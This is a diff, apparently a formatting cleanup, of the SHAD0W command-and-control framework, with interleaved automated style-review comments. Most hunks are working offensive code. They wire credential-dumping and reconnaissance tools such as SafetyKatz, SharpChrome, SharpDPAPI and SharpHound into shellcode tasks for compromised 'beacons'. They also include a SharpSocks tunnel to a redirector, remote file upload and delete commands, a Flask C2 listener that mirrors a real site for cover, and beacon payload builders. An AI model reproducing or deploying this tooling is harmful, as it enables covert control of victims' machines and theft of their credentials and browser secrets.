formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=usage_examples)
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=usage_examples)
# keep it behaving nice
parse.exit = exit
parse.error = error
@ -77,4 +80,4 @@ rm "C:\\Users\\thejoker\\deleteme.txt"
# set a task for the current beacon to do
shad0w.beacons[shad0w.current_beacon]["callback"] = rm_callback
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)


@ -16,16 +16,19 @@ USERCD_EXEC_ID = 0x3000
# location of safetykatz binary
SAFETYKATZ_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SafetyKatz.exe"
# little hack but lets us pass the args to Donut
class DummyClass(object):
# little hack but lets us pass the args to Donut
def __init__(self):
pass
def safetykatz_callback(shad0w, data):
print(data)
return ""
def main(shad0w, args):
# check we actually have a beacon


@ -16,16 +16,19 @@ USERCD_EXEC_ID = 0x3000
# location of seatbelt binary
SEATBELT_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/Seatbelt.exe"
# little hack but lets us pass the args to Donut
class DummyClass(object):
# little hack but lets us pass the args to Donut
def __init__(self):
pass
def seatbelt_callback(shad0w, data):
print(data)
return ""
def usage():
help_stuff = """
%&&@@@&&
@ -206,6 +209,7 @@ def usage():
"""
print(help_stuff)
def main(shad0w, args):
# check we actually have a beacon


@ -10,16 +10,18 @@ __type__ = "beacon"
ERROR = False
error_list = ""
# let argparse error and exit nice
def error(message):
global ERROR, error_list
ERROR = True
error_list += f"\033[0;31m{message}\033[0m\n"
def exit(status=0, message=None):
if message != None: print(message)
return
def main(shad0w, args):
global ERROR
@ -77,4 +79,4 @@ set -v MsfStageSize -d 14
shad0w.debug.error("Key Error")
return
return
return


@ -16,19 +16,23 @@ USERCD_EXEC_ID = 0x3000
# location of Sharpchrome binary
SHARPCHROME_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SharpChrome.exe"
# little hack but lets us pass the args to Donut
class DummyClass(object):
# little hack but lets us pass the args to Donut
def __init__(self):
pass
def sharpchrome_callback(shad0w, data):
print(data)
return ""
def usage():
pass
def main(shad0w, args):
# check we actually have a beacon


@ -16,19 +16,22 @@ USERCD_EXEC_ID = 0x3000
# location of sharpdpapi binary
SHARPDPAPI_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SharpDPAPI.exe"
# little hack but lets us pass the args to Donut
class DummyClass(object):
# little hack but lets us pass the args to Donut
def __init__(self):
pass
def sharpdpapi_callback(shad0w, data):
print(data)
return ""
def usage():
pass
def main(shad0w, args):
# check we actually have a beacon


@ -16,16 +16,19 @@ USERCD_EXEC_ID = 0x3000
# location of sharpdump binary
SHARPDUMP_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SharpDump.exe"
# little hack but lets us pass the args to Donut
class DummyClass(object):
# little hack but lets us pass the args to Donut
def __init__(self):
pass
def sharpdump_callback(shad0w, data):
print(data)
return ""
def main(shad0w, args):
# check we actually have a beacon


@ -16,8 +16,9 @@ USERCD_EXEC_ID = 0x3000
# location of sharphound binary
SHARPHOUND_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SharpHound.exe"
# little hack but lets us pass the args to Donut
class DummyClass(object):
# little hack but lets us pass the args to Donut
def __init__(self):
pass
@ -26,6 +27,7 @@ def sharphound_callback(shad0w, data):
return ""
def main(shad0w, args):
# check we actually have a beacon


@ -26,22 +26,25 @@ error_list = ""
# location of sharpsocks binary
sharpsocks_BIN = "/root/shad0w/bin/SharpSocks.x86.exe"
# let argparse error and exit nice
def error(message):
global ERROR, error_list
ERROR = True
error_list += f"\033[0;31m{message}\033[0m\n"
def exit(status=0, message=None):
if message != None: print(message)
return
def sharpsocks_callback(shad0w, data):
if shad0w.sharpsocks_verbose:
print(data)
return ""
def start_sharpsocks_server(http_listen=None, socks_listen=None, quick=True, cmd_line=None):
# modules directory
modules_dir = "/root/shad0w/modules/windows/sharpsocks/"
@ -64,8 +67,8 @@ def start_sharpsocks_server(http_listen=None, socks_listen=None, quick=True, cmd
try:
os.unlink("/tmp/sharpsocks.log")
except: pass
except:
pass
data = ""
for _ in range(0, 5):
@ -89,10 +92,12 @@ def start_sharpsocks_server(http_listen=None, socks_listen=None, quick=True, cmd
return key
def kill_server():
os.popen("killall -9 SharpSocksServe")
return
def await_for_socks_start(shad0w):
while True:
try:
@ -105,6 +110,7 @@ def await_for_socks_start(shad0w):
except FileNotFoundError: pass
return
def main(shad0w, args):
global EXEC_SHARPSOCKS
@ -148,7 +154,7 @@ sharpsocks client -s http://your.redirector:port/ -k key
pass
# make sure we have an argument
if (len(raw_args) == 1):
if len(raw_args) == 1:
parse.print_help()
return
@ -192,4 +198,4 @@ sharpsocks client -s http://your.redirector:port/ -k key
b64_comp_data = shellcode.generate(sharpsocks_BIN, args, args.param)
shad0w.beacons[shad0w.current_beacon]["task"] = (USERCD_EXEC_ID, b64_comp_data)
shad0w.beacons[shad0w.current_beacon]["callback"] = sharpsocks_callback
shad0w.beacons[shad0w.current_beacon]["callback"] = sharpsocks_callback
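Review bot: The `except:` around `os.unlink("/tmp/sharpsocks.log")` in `start_sharpsocks_server` is still bare after being split onto two lines, so it also swallows `KeyboardInterrupt` and `SystemExit`; `except FileNotFoundError:` (or `except OSError:`) states what is actually expected there. The same bare `except:` is kept in the `not_found` 404 handler of the Flask server section, where it hides any error raised while looking up served objects. `start_sharpsocks_server` begins and ends outside this hunk.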


@ -16,16 +16,18 @@ USERCD_EXEC_ID = 0x3000
# location of SharpUp binary
SHARPUP_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SharpUp.exe"
# little hack but lets us pass the args to Donut
class DummyClass(object):
# little hack but lets us pass the args to Donut
def __init__(self):
pass
def sharpup_callback(shad0w, data):
print(data)
return ""
def main(shad0w, args):
# check we actually have a beacon


@ -16,19 +16,23 @@ USERCD_EXEC_ID = 0x3000
# location of sharpwmi binary
SHARPWMI_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SharpWMI.exe"
# little hack but lets us pass the args to Donut
class DummyClass(object):
# little hack but lets us pass the args to Donut
def __init__(self):
pass
def sharpwmi_callback(shad0w, data):
print(data)
return ""
def usage():
pass
def main(shad0w, args):
# check we actually have a beacon


@ -21,16 +21,18 @@ error_list = ""
FILE_TO_UPLOAD = ""
FILE_DATA = ""
# let argparse error and exit nice
def error(message):
global ERROR, error_list
ERROR = True
error_list += f"\033[0;31m{message}\033[0m\n"
def exit(status=0, message=None):
if message != None: print(message)
return
def upload_callback(shad0w, data):
global FILE_TO_UPLOAD, FILE_DATA
@ -66,8 +68,8 @@ upload -f fake_secret_plans.txt -d C:\\Users\\thejoker\\Desktop\\batmans_secret_
# init the parser
parse = argparse.ArgumentParser(prog='upload',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=usage_examples)
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=usage_examples)
# keep it behaving nice
parse.exit = exit
@ -138,4 +140,4 @@ upload -f fake_secret_plans.txt -d C:\\Users\\thejoker\\Desktop\\batmans_secret_
# set a task for the current beacon to do
shad0w.beacons[shad0w.current_beacon]["callback"] = upload_callback
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)


@ -16,16 +16,19 @@ USERCD_EXEC_ID = 0x3000
# location of Watson binary
WATSON_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/Watson.exe"
# little hack but lets us pass the args to Donut
class DummyClass(object):
# little hack but lets us pass the args to Donut
def __init__(self):
pass
def watson_callback(shad0w, data):
print(data)
return ""
def main(shad0w, args):
# check we actually have a beacon


@ -21,16 +21,18 @@ TMP_EXEC_ID = 0x3000
ERROR = False
error_list = ""
# let argparse error and exit nice
def error(message):
global ERROR, error_list
ERROR = True
error_list += f"\033[0;31m{message}\033[0m\n"
def exit(status=0, message=None):
if message != None: print(message)
return
def whoami_callback(shad0w, data):
if len(data) > 1:
print("")
@ -38,6 +40,7 @@ def whoami_callback(shad0w, data):
return ""
def get_whoami_args(args):
data = ""
@ -52,6 +55,7 @@ def get_whoami_args(args):
return data
async def main(shad0w, args):
global ERROR
@ -124,4 +128,4 @@ whoami --groups
rcode = base64.b64encode(shellcode.generate(file, None, None, parse=False)).decode()
shad0w.beacons[shad0w.current_beacon]["callback"] = whoami_callback
shad0w.beacons[shad0w.current_beacon]["task"] = (TMP_EXEC_ID, rcode)
shad0w.beacons[shad0w.current_beacon]["task"] = (TMP_EXEC_ID, rcode)


@ -4,6 +4,7 @@ Compile the stuff
import os
class Binary(object):
def __init__(self):
super(Binary, self).__init__()


@ -16,6 +16,7 @@ from prompt_toolkit.patch_stdout import patch_stdout
from prompt_toolkit.auto_suggest import AutoSuggestFromHistory
from prompt_toolkit.shortcuts import prompt, CompleteStyle, PromptSession
class Console(object):
def __init__(self, shad0w):
@ -102,7 +103,8 @@ class Console(object):
print("ERROR:", e)
# if in debug mode drop the full traceback
if self.shad0w.debugv: traceback.print_exc()
if self.shad0w.debugv:
traceback.print_exc()
pass
except KeyboardInterrupt:
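Review bot: The `pass` left after the reformatted `if self.shad0w.debugv:` block appears to be dead code: the handler already runs `print("ERROR:", e)`, so the statement does nothing and can be dropped. Indentation is not preserved on this page, so confirm it belongs to the same `except` branch before removing it. The enclosing method starts and ends outside the hunk.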


@ -2,6 +2,7 @@ import sys
import time
import threading
class Debug(object):
def __init__(self, arg):
super(Debug, self).__init__()
@ -36,8 +37,7 @@ class Debug(object):
sys.stdout.write("\r")
def spinner(self, text):
spin_thread = threading.Thread(target=self.do_spinner, args=(text,))
spin_thread.daemon = False
spin_thread.start()
spin_thread.start()


@ -1,5 +1,6 @@
import random
class XOR(object):
def __init__(self):
super(XOR, self).__init__()
@ -8,6 +9,7 @@ class XOR(object):
def gen_key(self):
self.key = random.randint(10, 100)
def crypt_file(self, crypt, key, infile=None, data=None, data_length=None):
bytes = ""
if (infile != None) and (data == None):


@ -11,13 +11,14 @@ from flask import Flask, request, jsonify, Response
app = Flask(__name__)
# shut flask output up
log = logging.getLogger('werkzeug')
log.disabled = True
cli = sys.modules['flask.cli']
log = logging.getLogger('werkzeug')
log.disabled = True
cli = sys.modules['flask.cli']
cli.show_server_banner = lambda *x: None
IGNORE_CONTENT = ""
@app.before_request
def log_request():
# this will show every request that the flask server gets
@ -27,6 +28,7 @@ def log_request():
# do nothing just return
return None
@app.route("/")
def web_blank_page():
# this page should never be hit by a legit beacon, so if it is then its not a beacon.
@ -39,6 +41,7 @@ def web_blank_page():
elif shad0w.mirror is not None:
return shad0w.page_data
@app.route("/register", methods=["GET", "POST"])
def web_register_beacon():
# register the beacon
@ -48,18 +51,21 @@ def web_register_beacon():
# just give it the request so it can pull stuff out itself
return phandle.register_beacon(request)
@app.route("/tasks", methods=["GET", "POST"])
def web_task_beacon():
# register a task on a beacon
return phandle.task_beacon(request)
@app.route("/stage", methods=["GET", "POST"])
def web_stage_beacon():
# send the requested stage to a beacon
return phandle.stage_beacon(request)
@app.errorhandler(404)
def not_found(e):
@ -77,7 +83,8 @@ def not_found(e):
for obj in shad0w.beacons[shad0w.current_beacon]["serve"]:
if obj == request.path:
return shad0w.beacons[shad0w.current_beacon]["serve"][obj]
except: pass
except:
pass
if shad0w.mirror is None:
return ""
@ -90,10 +97,11 @@ def not_found(e):
return Response(data, status_code, headers)
def run_serv(*args):
# cant think of a better way doing this so guess i gotta use globals
global shad0w, phandle
shad0w = args[0]
shad0w = args[0]
phandle = Handler(shad0w)


@ -5,6 +5,7 @@ from prompt_toolkit.patch_stdout import patch_stdout
from lib.commands import *
class Handler(object):
def __init__(self, shad0w):
@ -17,8 +18,8 @@ class Handler(object):
# split command into name + args
splitcommand = cmd.split(" ")
basecmd = splitcommand[0]
cmd_args = splitcommand[0:]
basecmd = splitcommand[0]
cmd_args = splitcommand[0:]
# see if we need to execute a local command
try:
@ -35,7 +36,8 @@ class Handler(object):
os.chdir(cwd)
return
except IndexError: pass
except IndexError:
pass
# find the handle for the module in the globals list an call it with args


@ -3,9 +3,11 @@
import re
import requests
def get_base_domain(site):
return site.replace("https://", "").replace("http://", "").replace("/", "")
def get_base_page(shad0w, site, dynamic=False, htmlonly=False, method=None, headers=None, data=None, cookies=None):
try:
if dynamic:
@ -31,6 +33,7 @@ def get_base_page(shad0w, site, dynamic=False, htmlonly=False, method=None, head
if htmlonly:
return req.text
def fix_internal_links(shad0w, html, site):
# add us to paths
if shad0w.endpoint is None:
@ -50,6 +53,7 @@ def fix_internal_links(shad0w, html, site):
return html
def mirror_site(shad0w, site, dynamic=False, method=None, headers=None, data=None, cookies=None):
if not dynamic:
@ -61,4 +65,4 @@ def mirror_site(shad0w, site, dynamic=False, method=None, headers=None, data=Non
if dynamic:
data, headers, status_code = get_base_page(shad0w, site, dynamic=dynamic, method=method, headers=headers, data=data, cookies=cookies)
data = fix_internal_links(shad0w, data, site)
return data, status_code, headers
return data, status_code, headers


@ -8,7 +8,8 @@ from .responce_builder import Builder
DATA_CMD_OUT = 0x2000
DATA_CMD_PRO = 0x3000
DO_CALLBACK = 0x4000
DO_CALLBACK = 0x4000
class Handler(object):
@ -106,12 +107,12 @@ class Handler(object):
self.shad0w.beacons[beacon_id]["num"] = self.shad0w.beacon_count
# store basic info about beacon
self.shad0w.beacons[beacon_id]["domain"] = domain
self.shad0w.beacons[beacon_id]["machine"] = machine
self.shad0w.beacons[beacon_id]["username"] = username
self.shad0w.beacons[beacon_id]["arch"] = arch
self.shad0w.beacons[beacon_id]["os"] = opsystem
self.shad0w.beacons[beacon_id]["impersonate"] = None
self.shad0w.beacons[beacon_id]["domain"] = domain
self.shad0w.beacons[beacon_id]["machine"] = machine
self.shad0w.beacons[beacon_id]["username"] = username
self.shad0w.beacons[beacon_id]["arch"] = arch
self.shad0w.beacons[beacon_id]["os"] = opsystem
self.shad0w.beacons[beacon_id]["impersonate"] = None
# if we are impersonating a session then tell that beacon
if str(impersonate) != "None":
@ -202,7 +203,6 @@ class Handler(object):
self.shad0w.debug.log("invalid http method for stager")
return self.builder.build(blank=True)
def blank_page(self):
# does what the function says
return self.builder.build(blank=True)


@ -10,11 +10,13 @@ from lib.templates import powershell
formats = ('raw', 'exe', 'psh', 'dll')
def get_size(filename):
# get the bytes of the exe
with open(filename, 'rb') as file:
return len(file.read())
def format_raw(builder, length=True, code=False):
# extract the shellcode from the new beacon
rcode = buildtools.extract_shellcode()
@ -28,6 +30,7 @@ def format_raw(builder, length=True, code=False):
if code:
return rcode
def format_exe(builder, length=True, code=False):
# get the bytes of the exe
# with open("/root/shad0w/beacon/beacon.exe", 'rb') as file:
@ -55,6 +58,7 @@ def format_exe(builder, length=True, code=False):
with open(builder.outfile, 'rb') as file:
return file.read()
def format_powershell(builder, length=True, code=False):
outfile = builder.outfile
@ -79,6 +83,7 @@ def format_powershell(builder, length=True, code=False):
if code:
return pcode
def format_dll(builder, length=True, code=False):
# get the the beacon shellcode
@ -96,6 +101,7 @@ def format_dll(builder, length=True, code=False):
with open(builder.outfile, 'rb') as file:
return file.read()
def create(builder):
if builder.format == "raw":
return format_raw(builder)


@ -1,5 +1,6 @@
import json
class Builder(object):
def __init__(self, shad0w):
@ -27,7 +28,8 @@ class Builder(object):
try:
if resp["task"] == None:
resp["task"] = 0x1000
except KeyError: pass
except KeyError:
pass
# now return the dict in json format
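Review bot: `if resp["task"] == None:` compares with `==`, which dispatches to `__eq__`; the identity test `if resp["task"] is None:` is the idiomatic form and would fit a tidy-up commit. The `exit` helpers in the command modules keep the same pattern on one line, `if message != None: print(message)`, which could become `if message is not None:` followed by `print(message)` on its own line. The enclosing method starts and ends outside the hunk.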


@ -5,6 +5,7 @@ import tempfile
from lib.ShellcodeRDI import *
def generate_srdi(file, flags):
""" generate shellcode from a reflective dll using sRDI """
@ -15,12 +16,14 @@ def generate_srdi(file, flags):
return ConvertToShellcode(dll_data, hfunc, b"None", flags)
def parse_donut_error(data, filename):
if "Error : File not found." in data:
print(f"Unable to find '{filename}'.")
else:
print(f"Failed to execute '{filename}'.")
def generate(file, args, params, parse=True):
""" generate shellcode from a pe using Donut """
@ -110,4 +113,4 @@ def generate(file, args, params, parse=True):
# return the raw shellcode
with open(temp.name, "rb") as file:
return file.read()
return file.read()


@ -9,8 +9,9 @@ from datetime import datetime
from lib import buildtools
# list all command scripts in the commands dir, append to list of commands
def get_commands():
# list all command scripts in the commands dir, append to list of commands
commandList = []
for _, _, f in os.walk("/root/shad0w/lib/commands/"):
for file in f:
@ -18,16 +19,18 @@ def get_commands():
commandList.append(file.replace(".py",""))
return commandList
def generate_beacon_id():
# get md5 hash of the current date + time
return hashlib.md5(str(datetime.now()).encode()).hexdigest()
def get_data_from_json(jdata):
# get the data from data
id = ""
id = ""
opcode = 0
data = ""
data = ""
# if we get any errors, just return the above values and this req will then be ignored
try:
@ -43,18 +46,19 @@ def get_data_from_json(jdata):
return id, opcode, data
async def compile_and_store_static(shad0w):
# compile a static secure beacon and store it in memory
shad0w.payloads["x64_secure_static"] = {}
arch = "x64"
arch = "x64"
platform = "windows"
secure = "secure"
static = "static"
secure = "secure"
static = "static"
# basically just make a random string
dir_name = generate_beacon_id()
lib_dir_name = "/tmp/" + dir_name + "/lib/"
dir_name = generate_beacon_id()
lib_dir_name = "/tmp/" + dir_name + "/lib/"
build_dir_name = "/tmp/" + dir_name + "/build/"
Path(lib_dir_name).mkdir(parents=True, exist_ok=True)
@ -89,6 +93,7 @@ async def compile_and_store_static(shad0w):
return
async def compile_and_store_static_srdi(shad0w):
# compile a static secure beacon and store it in memory
shad0w.payloads["x64_secure_static_srdi"] = {}
@ -99,14 +104,14 @@ async def compile_and_store_static_srdi(shad0w):
static = "static"
# basically just make a random string
dir_name = generate_beacon_id()
lib_dir_name = "/tmp/" + dir_name + "/lib/"
dir_name = generate_beacon_id()
lib_dir_name = "/tmp/" + dir_name + "/lib/"
build_dir_name = "/tmp/" + dir_name + "/build/"
Path(lib_dir_name).mkdir(parents=True, exist_ok=True)
Path(build_dir_name).mkdir(parents=True, exist_ok=True)
mod_name = f"{build_dir_name}../beacon.dll"
mod_name = f"{build_dir_name}../beacon.dll"
os.system(f"cp -r /root/shad0w/beacon/lib/* {lib_dir_name}")
@ -136,13 +141,15 @@ async def compile_and_store_static_srdi(shad0w):
shad0w.compile_finished = True
return
def loading_banner(shad0w):
while shad0w.compile_finished != True:
loading = list("Starting SHAD0W C2...")
iter = 1
colour = random.choice([1,2,3,4,5,6])
colour = random.choice([1, 2, 3, 4, 5, 6])
for i in loading:
if shad0w.compile_finished == True: break
if shad0w.compile_finished == True:
break
time.sleep(0.15)
i = f"\033[1;3{colour}m" + i + "\033[0m"
@ -154,4 +161,4 @@ def loading_banner(shad0w):
sys.stdout.write("\r" + " "*100 + "\r")
sys.stdout.flush()
shad0w.screen_finish = True
shad0w.screen_finish = True
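Review bot: The build directory in `compile_and_store_static` and `compile_and_store_static_srdi` is a guessable path under `/tmp` (an MD5 of the current time) created with `exist_ok=True`, so a directory or symlink already placed there by another local user would be accepted and then written into by the `cp -r` call. `tempfile.mkdtemp()` creates the directory atomically with owner-only permissions, e.g. `dir_name = tempfile.mkdtemp()` with `lib_dir_name` and `build_dir_name` joined beneath it. Whether `tempfile` is already imported in this file is not visible in these hunks, and both functions continue outside them.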


@ -19,6 +19,7 @@ from lib import mirror
from lib import payload_format
from lib import tools
class Shad0wC2(object):
def __init__(self, args):
@ -26,42 +27,42 @@ class Shad0wC2(object):
super(Shad0wC2, self).__init__()
# payload store
self.payloads = {}
self.payloads = {}
# declare all the vitial variables to run.
self.addr = (args['address'], args['port'])
self.debugv = args['debug']
self.sslkey = args['key']
self.sslcrt = args['cert']
self.addr = (args['address'], args['port'])
self.debugv = args['debug']
self.sslkey = args['key']
self.sslcrt = args['cert']
# framework variables
self.variables = {}
self.variables = {}
# set the msf callback size
self.variables["MsfUriSize"] = 1337
# website we can mirror
self.mirror = args['mirror']
self.mirror = args['mirror']
# endpoint for modules to callback to
self.endpoint = args['endpoint']
self.endpoint = args['endpoint']
# runtime variables
self.beacons = {}
self.beacon_count = 0
self.current_beacon = None
self.beacons = {}
self.beacon_count = 0
self.current_beacon = None
# loading screen stuff
self.screen_finish = False
self.screen_finish = False
# get the debug/logging stuff ready
self.debug = debug.Debug(self.debugv)
self.debug = debug.Debug(self.debugv)
# console class
self.console = console.Console(self)
self.console = console.Console(self)
# super useful
self.crypt = encryption
self.crypt = encryption
def start(self):
@ -156,8 +157,6 @@ class Shad0wBuilder(object):
print("\033[1;32m[+]\033[0m", f"Created {self.outfile} ({length} bytes)")
if __name__ == '__main__':
# sort the first cmd switch to decide weather we beacon or listen
@ -201,4 +200,4 @@ if __name__ == '__main__':
if args["mode"] == "beacon":
# build the beacon
shad0w = Shad0wBuilder(args)
shad0w.build()
shad0w.build()